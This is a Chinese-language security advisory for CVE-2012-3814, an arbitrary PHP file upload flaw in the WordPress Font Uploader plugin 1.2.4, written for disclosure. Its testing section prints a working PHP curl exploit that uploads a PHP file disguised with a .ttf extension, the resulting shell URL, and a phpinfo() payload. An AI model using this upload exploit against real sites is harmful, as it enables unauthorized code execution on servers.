发布日期：2012-12-30
更新日期：2013-01-04

受影响系统：

WordPress Font Uploader插件 1.2.4

描述：

---

BUGTRAQ  ID: 57112
CVE(CAN) ID: CVE-2012-3814

WordPress Font Uploader是上传自己的字体文件并应用到网站上的插件。

WordPress Font Uploader存在安全漏洞，wp-content/plugins/font-uploader/font-upload.php脚本没有正确验证已上传文件的扩展名，通过上传带有 ".ttf"、".otf" 扩展名的PHP文件，可导致任意PHP代码执行。

<*来源：Sammy Forgit
  
  链接：http://www.securelist.com/en/advisories/49327
        http://www.opensyscom.fr/Actualites/wordpress-plugins-wordpress-font-uploader-shell-upload-vulnerability.html
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Sammy Forgit （）提供了如下测试方法：

Exploit :

PostShell.php
<?php

$uploadfile="lo.php.ttf";
$ch = curl_init("http://www[.]exemple[.]com/wordpress/wp-content/plugins/font-uploader/font-upload.php");
curl_setopt($ch, CURLOPT_POST, true);  
curl_setopt($ch, CURLOPT_POSTFIELDS,
        array('font'=>"@$uploadfile",
               'Submit'=>'submit'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";

?>

Shell Access : http://www[.]exemple[.]com/wordpress/wp-content/plugins/font-uploader/fonts/lo.php.ttf

lo.php.ttf
<?php
phpinfo();
?>

建议：

---

厂商补丁：

WordPress
---------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://wordpress.org/extend/plugins/font-uploader/

浏览次数：4524
严重程度：0（网友投票）